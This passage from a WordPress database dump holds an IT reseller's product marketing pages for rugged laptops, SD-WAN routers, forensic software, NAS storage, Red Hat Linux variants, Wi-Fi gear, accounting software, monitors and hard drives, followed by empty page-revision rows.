src=\"https://bintara.com.my/wp-content/uploads/2018/12/Image-2a_1_0.jpg\" alt=\"\" width=\"1200\" height=\"420\" />\r\n<h5>The Fully Rugged Toughbook models meet the demands of the most challenging working environments</h5>\r\nThe fully rugged Toughbook models are dust, water, vibration and drop proof from a height of up to 180cm. The Toughbook range is designed to operate in both extremely low and high temperatures, and come in a variety of formats from laptop to tablet.\r\n\r\nAs well as being resistant to hostile and demanding environments such as construction sites, hospitals, underground excavations, emergency situations encountered by the emergency services, airline maintenance and management, utility services maintenance, and transport, they offer daylight visible screens, excellent graphics and long battery life. The fully rugged Toughbook models can meet almost every challenge business, utility or military service can deliver and ensure that mobile workers can access volumes of data and deliver information in real time wherever they are, increasing efficiency and productivity.\r\n\r\n<img class=\"alignnone size-full wp-image-2196\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Image-4b_0.jpg\" alt=\"\" width=\"1200\" height=\"420\" />\r\n<h5>The Semi Rugged and Business Ruggedised Toughbook models</h5>\r\nSemi Rugged Toughbook modelsÂ are water resistant and capable of withstanding being dropped* with a toughened casing. Semi Rugged notebook and convertible tablet models mean these mobile business computing solutions support workers in the field in diverse circumstances such as enabling police officers to take witness statements electronically, telephone engineers to work more effectively across the network and business travelers to effectively deliver presentations using the flip screen technology of the CF-C2.\r\n\r\nLong battery life, optional GPS and the option of technology that allows batteries to be changed whilst working, mean there is a model of semi rugged Toughbook suitable for every business that needs robust mobile computing solutions.\r\n\r\nThe Toughbook flip over business ruggedisedÂ CF-MX4Â is light, with an attractive design making it perfect for the busy business traveler allowing them to keep in touch with the office and work effectively on the move. The Toughbook is resistant to being dropped,* and withstands 100kg/f pressure, providing business travelers a robust alternative to more fragile mobile computing options.\r\n<h6>*From a height of 76cm.</h6>\r\n<img class=\"alignnone size-full wp-image-2197\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/CF-MX4_bannerimage_v2_0_0_0.jpg\" alt=\"\" width=\"1200\" height=\"419\" />\r\n<h5>Computer docking solutions and accessories make Toughbook and Toughpad versatile and convenient</h5>\r\nWe offer a range of docking solutions, car chargers, battery chargers, bags, carrying straps and other accessories to ensure your business gets optimum performance from your Panasonic Toughbook and Toughpad devices. Click the link below to find out more about what is available.\r\n<h5>Professional Services to help you manage Toughbook and Toughpad hardware</h5>\r\nPanasonic is committed to providing you with the right computer product solution for your business. This is reflected in the range of professional services we offer. We can help with deployment to your workforce ensuring they have all the tools they need to work effectively and offer a buy-back programme for larger customers, to help you manage your investment in mobile working.\r\n\r\nTo discover more about the Toughbook and Toughpad range, please click the buttons below or contact us to discuss your needs.\r\n\r\n</div>\r\n[maxbutton id=\"1\" ]Â  Â  Â [maxbutton id=\"4\" ]\r\n\r\n</div>\r\n</div>','Panasonic Toughbook','','publish','closed','closed','','panasonic-toughbook','','','2018-12-20 10:38:29','2018-12-20 02:38:29','',0,'https://bintara.com.my/?page_id=1571',0,'page','',0),(1572,1,'2018-12-11 15:44:16','2018-12-11 07:44:16','<h3>Peplink</h3>\r\n<h4><strong>Simple, Unbreakable Branch Networking, Anywhere</strong></h4>\r\nFrom the companyâ€™s inception, we set out to create the most reliable and easiest-to-use routers. Since then, we have developed multi-WAN VPN bonding (SD-WAN) routers and access points withÂ industry-leading durability, a straightforward and intuitiveÂ web interface, and aÂ wide range of featuresÂ that are difficult to match.\r\n\r\nFromÂ home-office users, toÂ enterprise-branchÂ networks, toÂ emergency vehicles, we have helped thousands of customers migrate from traditional WAN to our SD-WAN solutions, resulting in increased bandwidth, higher WAN reliability, and lower costs.\r\n\r\n&nbsp;\r\n<h4><strong>Connect, Monitor, and Manage From the Cloud</strong></h4>\r\n<div class=\"column one-second\"></div>\r\n<div class=\"column one-second\">\r\n\r\nAs cloud computing came of age, we saw new ways to make networks easier to manage and more flexible than ever. We continued developing new products that provided SD-WAN capabilities.\r\n\r\nWeÂ virtualized our VPN bonding technology, enabling virtual machines running on popular platforms (such as Amazon Web Services), to build unbreakable VPN with our edge network devices and with each other. We developed aÂ cloud-based central controllerÂ that helps network administrators visualize, manage, and keep track of complex global WAN deployments via a single web console. Many formerly time-consuming tasks such as firmware updates, configuration changes, and VPN configuration can now all be done by the hundreds with just a few clicks.\r\n\r\n&nbsp;\r\n\r\n</div>\r\n<h4><strong>Fully Integrated Networking Solution</strong></h4>\r\n<div class=\"column one-second\">\r\n\r\nFrom routers to access points to cloud platforms, we have everything you need to build a software-defined network that is fully configurable from any web browser. All our SD-WAN technologies are developed andÂ tested in-house, providing you with easy and seamless networking that you can always count on.\r\n\r\n</div>\r\n<div class=\"column one-second\">\r\n\r\nWe believe that quality, innovative products, and passionate customer service can help everyone experience a better connected world. Thatâ€™s why happy customers around the globe depend on Peplink.\r\n\r\n</div>\r\n[maxbutton id=\"1\" ]','Peplink','','publish','closed','closed','','peplink','','','2018-12-13 22:35:29','2018-12-13 14:35:29','',0,'https://bintara.com.my/?page_id=1572',0,'page','',0),(1573,1,'2018-12-11 15:44:36','2018-12-11 07:44:36','<img class=\"alignnone wp-image-2127 size-full\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/qator-live.jpg\" alt=\"\" width=\"294\" height=\"126\" />\r\n\r\n&nbsp;\r\n<h3><strong>QatorLive</strong> is live forensic solution to collect and analyze digital evidence on the spot.</h3>\r\n<h3><b>QatorLive</b><b> features</b></h3>\r\n<ul>\r\n 	<li>Collect evidence easily through rapid analysis of target system.</li>\r\n 	<li>Get necessary data through quick storage device scan.</li>\r\n 	<li>Collect various and vital data with ease.</li>\r\n 	<li>The program runs from USB device therefore itâ€™s convenient and easy-to-use.</li>\r\n 	<li>By using preset policies, itâ€™s possible to check the necessary data rapidly from a large number of scanned data.</li>\r\n 	<li>Software is built easily so that even non-experts wonâ€™t have problems using it</li>\r\n</ul>\r\n<img class=\"alignnone wp-image-2126 size-large\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/qator-live-1024x658.png\" alt=\"\" width=\"800\" height=\"514\" />\r\n\r\n&nbsp;\r\n\r\n[maxbutton id=\"1\" ]\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;','Qator Live','','publish','closed','closed','','qator-live','','','2018-12-14 10:07:37','2018-12-14 02:07:37','',0,'https://bintara.com.my/?page_id=1573',0,'page','',0),(1574,1,'2018-12-11 15:44:51','2018-12-11 07:44:51','','Qator Investigator','','publish','closed','closed','','qator-investigator','','','2018-12-11 15:44:51','2018-12-11 07:44:51','',0,'https://bintara.com.my/?page_id=1574',0,'page','',0),(1575,1,'2018-12-11 15:45:40','2018-12-11 07:45:40','<h3>Qator Enterpriseâ„¢</h3>\r\n<h4><img class=\"alignnone wp-image-1948 size-full\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Qator_big.png\" alt=\"\" width=\"239\" height=\"300\" /></h4>\r\n<h4>Remote Forensic Analysis &amp; Security Incident Management Solution</h4>\r\n<ul>\r\n 	<li>Forensic investigation function</li>\r\n 	<li>Investigate confidential information breach</li>\r\n 	<li>Check important information distribution</li>\r\n 	<li>Collect various information from client</li>\r\n</ul>\r\n<h4>Summary</h4>\r\n<ul>\r\n 	<li>Qator Enterprise allows users to efficiently track down information and inspect systems in case of information breach.</li>\r\n 	<li>It allows users to prevent breaches by analyzing target PCs via remote inspection.</li>\r\n</ul>\r\n<img class=\"alignnone size-full wp-image-1942\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/qator_summary_new.png\" alt=\"\" width=\"700\" height=\"167\" />\r\n<h4>Forensics</h4>\r\n<ul>\r\n 	<li>Search and analyze files</li>\r\n 	<li>Restore deleted data</li>\r\n 	<li>Time-series analysis</li>\r\n 	<li>Internet/email analysis</li>\r\n 	<li>Evidence imaging</li>\r\n 	<li>DRM document analysis</li>\r\n</ul>\r\n<h4>Data Collection</h4>\r\n<ul>\r\n 	<li>Periodic data collection</li>\r\n 	<li>Volatile data collection</li>\r\n 	<li>Remote inspection</li>\r\n 	<li>PC screen image collection</li>\r\n</ul>\r\n<h4>Remote Inspection</h4>\r\n<ul>\r\n 	<li>Inspect file use</li>\r\n 	<li>Inspect PC screen</li>\r\n 	<li>Set up security management policy</li>\r\n 	<li>Create report</li>\r\n</ul>\r\n&nbsp;\r\n\r\n[maxbutton id=\"1\" ]','Qator Enterprise','','publish','closed','closed','','qator-enterprise','','','2018-12-12 16:39:15','2018-12-12 08:39:15','',0,'https://bintara.com.my/?page_id=1575',0,'page','',0),(1576,1,'2018-12-11 15:46:56','2018-12-11 07:46:56','<h3 class=\"tit03\">Building your business with the Turbo NAS</h3>\r\n<p class=\"txt01\">Whether starting out or growing; businesses require a rock-solid IT infrastructure that will ensure that they have the right tools, hardware and potential to continue growing. And out of all the elements in an IT base, storage is the lifeblood that keeps a company moving forward. QNAP provides a full range of cutting-edge network-attached storage devices that not only fulfill storage needs, but also provide a wide range of services and features to greatly increase the productivity and options of your business.</p>\r\n\r\n<h4 class=\"tit02\">Challenges for aÂ growing business</h4>\r\n<p class=\"txt01\">See just a number of the common issues surrounding a growing business, before finding out how the Turbo NAS can help.</p>\r\n&nbsp;\r\n<h3 class=\"tit01\">How a Turbo NAS can assist your business</h3>\r\nUser-friendly design withÂ easy installation &amp; maintenance. From its intuitive user interface, to one-click installation and ease of installing new drives, the Turbo NAS.\r\n\r\n&nbsp;\r\n<h4>Hassle-free remoteÂ access options</h4>\r\nHave all of your critical files at your fingertips in order to seal a deal or to complete your work with a wide range of remote access options. From syncing to mobile devices to accessing virtual machines, you can always take your office with you, wherever you go..\r\n\r\n&nbsp;\r\n<h4>Go beyond storage withÂ QNAP business apps</h4>\r\nThe Turbo NAS is more than just storage. With a wide range of business-optimized apps, it can be the core of an email server, web server, printer server, virtualization tasks, and much more.\r\n\r\n&nbsp;\r\n<h4>Scale your storage forÂ future needs.</h4>\r\nYou can connect the Turbo NAS to compatible QNAP Expansion Enclosures and effortlessly scale the existing storage base as needed. This ensures that none of your initial investment goes to waste.\r\n\r\n&nbsp;\r\n<h4>Centralized storage &amp;Â backup</h4>\r\nWith a large storage capacity, excellent file transfer speed, a range of backup apps and solid hardware, the Turbo NAS is the perfect location for storing your crucial files and keeping them secure.\r\n\r\n&nbsp;\r\n\r\n[maxbutton id=\"1\" ]','Qnap','','publish','closed','closed','','qnap','','','2018-12-14 15:46:03','2018-12-14 07:46:03','',0,'https://bintara.com.my/?page_id=1576',0,'page','',0),(1577,1,'2018-12-11 15:47:10','2018-12-11 07:47:10','<h3><strong>SERVER VARIANTS &amp; OPTIONS</strong></h3>\r\n<h4>An OS for every occasion</h4>\r\nExtend your Linux infrastructure with customized versions of Red Hat Enterprise Linux, add-on functionality, desktop options, and developer tools.\r\n\r\nNew to Red Hat Enterprise Linux? Learn how it can help you modernize your IT infrastructure and free you from the costs and burdens of legacy systems.\r\n<h4>Red Hat Enterprise Linux Atomic Host</h4>\r\nRed Hat Enterprise Linux Atomic Host is a secure, minimal-footprint operating system optimized to run Linux containers. It couples the flexible, lightweight, and modular capabilities of Linux containers with the reliability and security of Red Hat Enterprise Linux in a reduced image size.\r\n\r\n<strong>With Red Hat Enterprise Linux Atomic Host, you can:</strong>\r\n<ul>\r\n 	<li>Deliver apps faster.</li>\r\n 	<li>Reduce support and maintenance efforts.</li>\r\n 	<li>Extend container portability across open hybrid cloud infrastructure.</li>\r\n 	<li>Inherit the stability and maturity of Red Hat Enterprise Linux.</li>\r\n</ul>\r\n&nbsp;\r\n<h4>Red Hat Enterprise Linux Server for High-Performance Computing (HPC)</h4>\r\nRed Hat Enterprise Linux Server for HPC is a robust platform that helps scientific users tackle challenging workloads by deploying clusters of systems. Red Hat Enterprise Linux clusters are affordable, easy to deploy, and support hardware scale-out.\r\n\r\n<strong>With Red Hat Enterprise Linux Server for HPC, you can:</strong>\r\n<ul>\r\n 	<li>Streamline deployment with a lightweight clustering option.</li>\r\n 	<li>Customize the platform for your environment.</li>\r\n 	<li>Minimize points of failure and security vulnerabilities.</li>\r\n 	<li>Simplify management tasks.</li>\r\n</ul>\r\n&nbsp;\r\n<h4>Red Hat Enterprise Linux for Power</h4>\r\nRed Hat Enterprise Linux for PowerÂ® includes additional components and versions of user packages for IBMÂ® Power Systems hardware and firmware. Deploy apps with confidence using the advanced features in IBM Power Systems and the consistency and flexibility of the market-leading Red Hat Enterprise Linux operating platform.\r\n\r\n<strong>With Red Hat Enterprise Linux for Power, you can:</strong>\r\n<ul>\r\n 	<li>Give your IT organization hardware flexibility for workloads and use cases from big data analytics to cloud computing.</li>\r\n 	<li>Support the latest IBM Power Systems features, including both big and little endian modes.</li>\r\n 	<li>Enable efficient operations and increase IT staff productivity through architecture-agnostic operating system standardization.</li>\r\n</ul>\r\n&nbsp;\r\n<h4>Red Hat Enterprise Linux for IBM z Systems</h4>\r\nBuilt on a decade-plus of industry collaboration, Red Hat Enterprise Linux for IBM z Systems brings Linux apps to the mainframe, and delivers efficient management for your Linux workloads. Combine the core strengths of the IBM mainframe and IBM software with the open flexibility of Linux to reduce complexity and cost for todayâ€™s applications.\r\n\r\n<strong>With Red Hat Enterprise Linux for IBM z Systems, you can:</strong>\r\n<ul>\r\n 	<li>Give your IT organization the hardware flexibility for workloads and use cases from big data analytics to cloud computing.</li>\r\n 	<li>Run Linux-certified apps on IBM z Systems.</li>\r\n 	<li>Increase efficiency of operations and IT staff productivity through architecture-agnostic operating system standardization.</li>\r\n</ul>\r\n&nbsp;\r\n<h4>Red Hat Enterprise Linux for Real Time</h4>\r\nRed Hat Enterprise Linux for Real Time is a computing platform for deadline-orientated apps and time-sensitive workloads. Using a specialized version of the Red Hat Enterprise Linux 7 kernel that has been tuned to deliver consistent low-latency response times, Red Hat Enterprise Linux for Real Time retains the reliability, scalability, and performance of the worldâ€™s leading enterprise Linux platform.\r\n\r\n<strong>With Red Hat Enterprise Linux for Real Time, you can:</strong>\r\n\r\nMinimize the potential for deviations in application performance with scheduling and performance gains.\r\nInherit the stability and maturity of Red Hat Enterprise Linux.\r\nEnjoy full application compatibility with standard Red Hat Enterprise Linux.\r\n\r\n&nbsp;\r\n<h4>Red Hat Enterprise Linux for SAP Applications</h4>\r\nRed Hat Enterprise Linux for SAPÂ® Applications lets you reduce the complexity of your SAP application and database deployments. It includes the infrastructure software stack you need for optimal operation of SAP applications, plus enterprise-class service and support. As a Red Hat customer, you can get a ready-to-use, fully supported SAP environment in one package for new installations of or migrations to Red Hat Enterprise Linux.\r\n\r\n<strong>With Red Hat Enterprise Linux for SAP Applications, you can:</strong>\r\n<ul>\r\n 	<li>Deploy a platform optimized for SAP workloads.</li>\r\n 	<li>Speed issue resolution with our cooperative support agreement and streamlined customer communication.</li>\r\n 	<li>Be confident that SAP products are optimized and certified on Red Hat Enterprise Linux through collaborative engineering.</li>\r\n</ul>\r\n&nbsp;\r\n<h4>Red Hat Enterprise Linux for SAP Solutions</h4>\r\nRed Hat Enterprise Linux for SAP Solutions provides an open, reliable, and scalable foundation for your most demanding data solutions. This ready-to-use environment is preconfigured for performance and optimized for SAP Solutions.\r\n\r\n<strong>With Red Hat Enterprise Linux for SAP Solutions, you can:</strong>\r\n<ul>\r\n 	<li>Simplify your SAP landscape by standardizing on 1 operating system.</li>\r\n 	<li>Deploy in on-premise or off-premise cloud environments.</li>\r\n 	<li>Speed issue resolution with our cooperative support agreement and streamlined customer communication.</li>\r\n</ul>\r\n&nbsp;\r\n\r\n[maxbutton id=\"1\" ]','Redhat','','publish','closed','closed','','redhat','','','2018-12-19 14:44:48','2018-12-19 06:44:48','',0,'https://bintara.com.my/?page_id=1577',0,'page','',0),(1578,1,'2018-12-11 15:47:20','2018-12-11 07:47:20','<h3>Ruckus SMALL AND MEDIUM BUSINESS</h3>\r\n<h4>SMB Wi-Fi and Network Solutions that Just Work</h4>\r\nSmall and medium-size businesses (SMBs) rely on worry-free, high-performance Wi-Fi to spark growth and boost productivity. With Ruckus, Wi-Fi for businessÂ is both easy and affordable. Turn any space into a workspace with dependable network coverage. Easily set up different types of secure guest networks on the fly to engage with customers, partners, suppliers, and contractors. Ruckus access points (APs) and switches offer superior coverage and capacity, so you can grow without going over budget.\r\n\r\nYou also donâ€™t need specialized IT staff or extensive training to deploy and manage your Ruckus small business Wi-Fi solutions. With Ruckus, it just works.\r\n<div>\r\n<h3>Controller-less and Cloud-managed Wi-Fi Options</h3>\r\nNo IT staff?Â  No problem.Â Â Ruckus Unleashed APsÂ are plug-and-play simple, so Unleashed is the ideal Wi-Fi small business solution for your single-site business. Even without an IT staff, you can set up a high-performance WLAN to connect employees, serve customers, and support business operations.\r\n\r\n</div>\r\n<div>ChooseÂ Ruckus Cloud Wi-FiÂ if you have big expectations for your multi-site WLAN, but not big IT budgets or staff. Manage your sites from anywhere using a single-pane-of-glass web UI or the Ruckus Cloud mobile app. With cloud-managed Wi-Fi you never have to worry about software updates and security upgradesâ€”theyâ€™re handled automatically.</div>\r\n<div></div>\r\n<div>\r\n<div>\r\n<h3>Running Your SMB Business Over Wi-Fi</h3>\r\nIn a world increasingly dependent on internet connectivity, employee productivity and customer satisfaction depend on uninterrupted network access. You want the best Wi-Fi AP for your business. Ruckus APs and switches incorporate patented technologies for superior throughput, coverage, and capacity.\r\n\r\n</div>\r\nRuckus also ensures a rock-solid foundation for cloud-based business applications that make you more competitive, including: mobile inventory management, point-of-sale, collaboration services, customer relationship management, and ecommerce.\r\n<div>\r\n<h3>Wi-Fi for Business Gains and Cost Reductions</h3>\r\nAs you expand your small business Wi-Fi network, you want to be conservative with costs. Our products and services are built with cost savings in mind. Here are just a few of the ways we achieve that for you:\r\n\r\n</div>\r\n<ul>\r\n 	<li>Ruckus Unleashed and Ruckus Cloud Wi-Fi keep costs down by eliminating the need for on-premises controllers and reducing dependence on expensive IT resources.</li>\r\n 	<li>Use Ruckus APs withÂ SmartMeshÂ to eliminate high cabling costs in large spaces (like warehouses) and strengthen redundancy. Both Ruckus Unleashed and Ruckus Cloud Wi-Fi support meshing.</li>\r\n 	<li>Ruckus APs offer better capacity and coverage (handing as much as 50% more clients than competitive solutions). Fewer APs needed means savings on licenses, cable runs, switch ports, and power.</li>\r\n 	<li>Ruckus ICX switchesÂ offer easily upgradeable and scalable high performance connectivity for APs, VoIP phones and other network devices.Â  Available with silent operation (i.e. no fan noise) in rack-mount or compact 12-port form factor.</li>\r\n</ul>\r\n[maxbutton id=\"1\" ]\r\n\r\n</div>','Ruckus','','publish','closed','closed','','ruckus','','','2018-12-14 15:35:05','2018-12-14 07:35:05','',0,'https://bintara.com.my/?page_id=1578',0,'page','',0),(1579,1,'2018-12-11 15:47:35','2018-12-11 07:47:35','<h3 id=\"header_0_PrimaryNavigationRepeater_PagePreviewsRepeater_0_TitleControl_0\" class=\"h2\"><span id=\"header_0_PrimaryNavigationRepeater_PagePreviewsRepeater_0_lblPreviewTitle_0\">Sage Business Cloud</span></h3>\r\nSage Business Cloud is all you\'ll ever need to help your small or medium-sized business grow faster.\r\n\r\nSimply start with one of our core products and add on other Sage Business Cloud products or products from our marketplace. Tailor the solution that is just right for your needs.\r\n<h3>The Connected Business. Enabled.</h3>\r\n<h4>Whether youâ€™re running a startup or a global enterprise, take care of your finances, operations, and more with Sage Business Cloud.</h4>\r\nEverything your business needs under one platform to manage your accounting, financials, operations, people and payroll, regardless of size, complexity and industry. Sage Business Cloud brings together our broad range of cloud products combined with an applications marketplace that can deliver a one-stop-shop solution, providing our customers with the only business management platform theyâ€™ll need throughout their business journey.\r\n\r\nLocally, weâ€™re busy building a path to Sage Business Cloud by rapidly adding products from our global suite, cloud enabling and enhancing local products, and working with our ecosystem partners to complete this vision of enabling connected business for our customers.\r\n\r\nSimply start with one of our core desktop or cloud connected desktop products, and add on other Sage Business Cloud products or products from our applications marketplace once available so you can tailor the solution that is just right for your business needs.\r\n<h3><strong>Sage 300cloud</strong></h3>\r\nThe same capabilities of Sage 300 desktop solution with cloud connected features so you can reap the benefits of mobility, anytime/anywhere access, and a modern new user interface as well as dashboard with key performance indicators.Take care of your finances, operations, and inventory. For larger businesses.\r\n\r\n&nbsp;\r\n\r\n[maxbutton id=\"1\" ]','Sage','','publish','closed','closed','','sage','','','2018-12-14 15:25:54','2018-12-14 07:25:54','',0,'https://bintara.com.my/?page_id=1579',0,'page','',0),(1580,1,'2018-12-11 15:47:48','2018-12-11 07:47:48','<h3>Samsung Monitor</h3>\r\n<h4>Immersive Experience</h4>\r\nDiscover the big, bold panoramic views that curved screens deliver.\r\n<h4>Excellence in Wok &amp; Play</h4>\r\nEnjoy a more Immersive Entertainment Experience through Samsungâ€™s Versatile High-Resolution Monitors\r\n\r\n&nbsp;\r\n\r\n<img class=\"alignnone wp-image-2532 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/32-CJG5-Curved-Gaming-Monitor-300x289.png\" alt=\"\" width=\"300\" height=\"289\" />\r\n<h4>32\" CJG5 Curved Gaming Monitor with WQHD Resolution and 144Hz Refresh Rate</h4>\r\n<ul>\r\n 	<li>WQHD resolution (2560x1440)</li>\r\n 	<li>144hz refresh rate</li>\r\n 	<li>Immersive viewing experience with curved screen</li>\r\n</ul>\r\n[maxbutton id=\"1\" ]\r\n\r\n&nbsp;\r\n\r\n<img class=\"alignnone wp-image-2533 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/24-Curved-Gaming-Monitor-CFG73-283x300.png\" alt=\"\" width=\"283\" height=\"300\" />\r\n<h4>24\" Curved Gaming Monitor CFG73 with Quantum Dot Display</h4>\r\n<ul>\r\n 	<li>Precise, firm positioning</li>\r\n 	<li>Curved to pull you in</li>\r\n 	<li>Smoother gameplay</li>\r\n</ul>\r\n[maxbutton id=\"1\" ]\r\n\r\n&nbsp;\r\n\r\n<img class=\"alignnone wp-image-2534 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/34-Curved-Widescreen-Monitor-300x206.png\" alt=\"\" width=\"300\" height=\"206\" />\r\n<h4>34\" Curved Widescreen Monitor</h4>\r\n<ul>\r\n 	<li>Quantum dot technology supporting sRGB 125%</li>\r\n 	<li>1500 R Curvature 34â€ Widescreen Monitor</li>\r\n 	<li>3,000:1 contrast ratio</li>\r\n</ul>\r\n[maxbutton id=\"1\" ]\r\n\r\n&nbsp;\r\n\r\n<img class=\"alignnone wp-image-2535 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/32-Curved-LED-Monitor-300x214.png\" alt=\"\" width=\"300\" height=\"214\" />\r\n<h4>32\" Curved LED Monitor with ultra slim design</h4>\r\n<ul>\r\n 	<li>1800 R curvature for an immersive viewing experience</li>\r\n 	<li>Glossy white ultra-slim and sleek design</li>\r\n 	<li>Vibrant Superior Picture Quality</li>\r\n</ul>\r\n[maxbutton id=\"1\" ]\r\n\r\n&nbsp;\r\n\r\n<img class=\"alignnone wp-image-2536 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/32-Curved-Monitor-300x228.png\" alt=\"\" width=\"300\" height=\"228\" />\r\n<h4>32\" Curved Monitor with Quantum dot and WQHD resolution</h4>\r\n<ul>\r\n 	<li>Richer, more vivid colors with Quantum Dot technology</li>\r\n 	<li>Incredibly detailed, pin-sharp images with WQHD resolution</li>\r\n 	<li>Immersive viewing experience with Industry-leading 1800R curvature</li>\r\n 	<li>Enhanced gaming experience with AMD Freesync and Game mode</li>\r\n</ul>\r\n[maxbutton id=\"1\" ]\r\n\r\n&nbsp;\r\n\r\n<img class=\"alignnone wp-image-2537 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/49-QLED-Gaming-Monitor-CHG90-300x158.png\" alt=\"\" width=\"300\" height=\"158\" />\r\n<h4>49\" QLED Gaming Monitor CHG90 with Super Ultra-Wide Screen</h4>\r\n<ul>\r\n 	<li>Quantum Dot (QLED)</li>\r\n 	<li>HDR</li>\r\n 	<li>144 Hz refresh rate / 1 ms Respond time</li>\r\n</ul>\r\n[maxbutton id=\"1\" ]','Samsung','','publish','closed','closed','','samsung','','','2018-12-19 11:56:11','2018-12-19 03:56:11','',0,'https://bintara.com.my/?page_id=1580',0,'page','',0),(1581,1,'2018-12-11 15:49:34','2018-12-11 07:49:34','<h3>IronWolf NAS Hard Drives</h3>\r\n<div class=\"row-fluid\">\r\n<h4><img class=\"alignnone size-full wp-image-2177\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ironwolf-mo-b-14tb-vn0008-front-200x200.png\" alt=\"\" width=\"200\" height=\"200\" /></h4>\r\n<h4 class=\"colorWhite\">The Best Comes From Within</h4>\r\n<p class=\"colorWhite\">Seagate has dominated the data storage industry for 40 years.</p>\r\n<p class=\"colorWhite\">We understand your unique data storage challenges, and crafted the IronWolf<sup>Â®</sup>Â and IronWolf Pro 14 TB NAS hard drives to help you achieve your goals.</p>\r\n\r\n<h4>Be Tough. Be Ready.</h4>\r\n<div class=\"row-fluid\">\r\n<div class=\"span6\">\r\n\r\nFor everything NAS, thereâ€™s IronWolf and IronWolf Pro always on, always working.\r\n\r\nBuilt for multi-user environments and high workload rates, these NAS hard drives are enhanced with AgileArray technology for optimal reliability and system scalability.\r\n<h4 class=\"colorWhite\">Drive Health and Data Recovery</h4>\r\n<p class=\"colorWhite\">IronWolf Health Management (IHM) means better drive health. When IronWolf or IronWolf Pro hard drives are integrated into compatible network attached storage (NAS) systems, the overall system reliability increases because the NAS system is constantly monitored and users are alerted if needed.</p>\r\nFor further protection, a Rescue Recovery Data Plan is included for 2 years when you purchase and register an IronWolf Pro drive.Â Youâ€™ll have access to a global team of world-class data recovery experts in case of unexpected data loss.\r\n<h4 class=\"colorWhite\">Built for Work. Built for Performance.</h4>\r\n<p class=\"colorWhite\">Multiple users can confidently upload and download data on a NAS system populated with IronWolf hard drives. All IronWolf hard drives are equipped with RV sensors to maintain performance in multi-bay NAS enclosures.</p>\r\n\r\n<h4 class=\"colorWhite\">Support Your Business</h4>\r\n<p class=\"colorWhite\">A small business needs data that can thrive. IronWolf NAS hard drives can handle the vibrations and high workload rates of a high data network within a multi-RAID environment.</p>\r\n\r\n<h4 class=\"colorWhite\">Be Creative. Keep Growing.</h4>\r\n<p class=\"colorWhite\">IronWolf and IronWolf Pro help keep you on schedule with 24Ã—7 remote access, backup, and file sharing. So keep doing what you do best. These drives will keep pace with your growing data storage requirements.</p>\r\n\r\n</div>\r\n[maxbutton id=\"1\" ]\r\n\r\n</div>\r\n</div>','Seagate','','publish','closed','closed','','seagate','','','2018-12-14 15:27:30','2018-12-14 07:27:30','',0,'https://bintara.com.my/?page_id=1581',0,'page','',0),(1582,1,'2018-12-11 15:42:45','2018-12-11 07:42:45','','Nutanix','','inherit','closed','closed','','1567-revision-v1','','','2018-12-11 15:42:45','2018-12-11 07:42:45','',1567,'https://bintara.com.my/blog/2018/12/11/1567-revision-v1/',0,'revision','',0),(1583,1,'2018-12-11 15:42:56','2018-12-11 07:42:56','','NVivo','','inherit','closed','closed','','1568-revision-v1','','','2018-12-11 15:42:56','2018-12-11 07:42:56','',1568,'https://bintara.com.my/blog/2018/12/11/1568-revision-v1/',0,'revision','',0),(1596,1,'2018-12-11 15:49:34','2018-12-11 07:49:34','','Seagate','','inherit','closed','closed','','1581-revision-v1','','','2018-12-11 15:49:34','2018-12-11 07:49:34','',1581,'https://bintara.com.my/blog/2018/12/11/1581-revision-v1/',0,'revision','',0),(1584,1,'2018-12-11 15:43:16','2018-12-11 07:43:16','','PaloAlto','','inherit','closed','closed','','1569-revision-v1','','','2018-12-11 15:43:16','2018-12-11 07:43:16','',1569,'https://bintara.com.my/blog/2018/12/11/1569-revision-v1/',0,'revision','',0),(1585,1,'2018-12-11 15:43:35','2018-12-11 07:43:35','','Panasonic','','inherit','closed','closed','','1570-revision-v1','','','2018-12-11 15:43:35','2018-12-11 07:43:35','',1570,'https://bintara.com.my/blog/2018/12/11/1570-revision-v1/',0,'revision','',0),(1586,1,'2018-12-11 15:43:46','2018-12-11 07:43:46','','Panasonic Toughbook','','inherit','closed','closed','','1571-revision-v1','','','2018-12-11 15:43:46','2018-12-11 07:43:46','',1571,'https://bintara.com.my/blog/2018/12/11/1571-revision-v1/',0,'revision','',0),(1587,1,'2018-12-11 15:44:16','2018-12-11 07:44:16','','Peplink','','inherit','closed','closed','','1572-revision-v1','','','2018-12-11 15:44:16','2018-12-11 07:44:16','',1572,'https://bintara.com.my/blog/2018/12/11/1572-revision-v1/',0,'revision','',0),(1588,1,'2018-12-11 15:44:36','2018-12-11 07:44:36','','Qator Live','','inherit','closed','closed','','1573-revision-v1','','','2018-12-11 15:44:36','2018-12-11 07:44:36','',1573,'https://bintara.com.my/blog/2018/12/11/1573-revision-v1/',0,'revision','',0),(1589,1,'2018-12-11 15:44:51','2018-12-11 07:44:51','','Qator Investigator','','inherit','closed','closed','','1574-revision-v1','','','2018-12-11 15:44:51','2018-12-11 07:44:51','',1574,'https://bintara.com.my/blog/2018/12/11/1574-revision-v1/',0,'revision','',0),(1590,1,'2018-12-11 15:45:40','2018-12-11 07:45:40','','Qator Enterprise','','inherit','closed','closed','','1575-revision-v1','','','2018-12-11 15:45:40','2018-12-11 07:45:40','',1575,'https://bintara.com.my/blog/2018/12/11/1575-revision-v1/',0,'revision','',0),(1591,1,'2018-12-11 15:46:56','2018-12-11 07:46:56','','Qnap','','inherit','closed','closed','','1576-revision-v1','','','2018-12-11 15:46:56','2018-12-11 07:46:56','',1576,'https://bintara.com.my/blog/2018/12/11/1576-revision-v1/',0,'revision','',0),(1592,1,'2018-12-11 15:47:10','2018-12-11 07:47:10','','Redhat','','inherit','closed','closed','','1577-revision-v1','','','2018-12-11 15:47:10','2018-12-11 07:47:10','',1577,'https://bintara.com.my/blog/2018/12/11/1577-revision-v1/',0,'revision','',0),(1593,1,'2018-12-11 15:47:20','2018-12-11 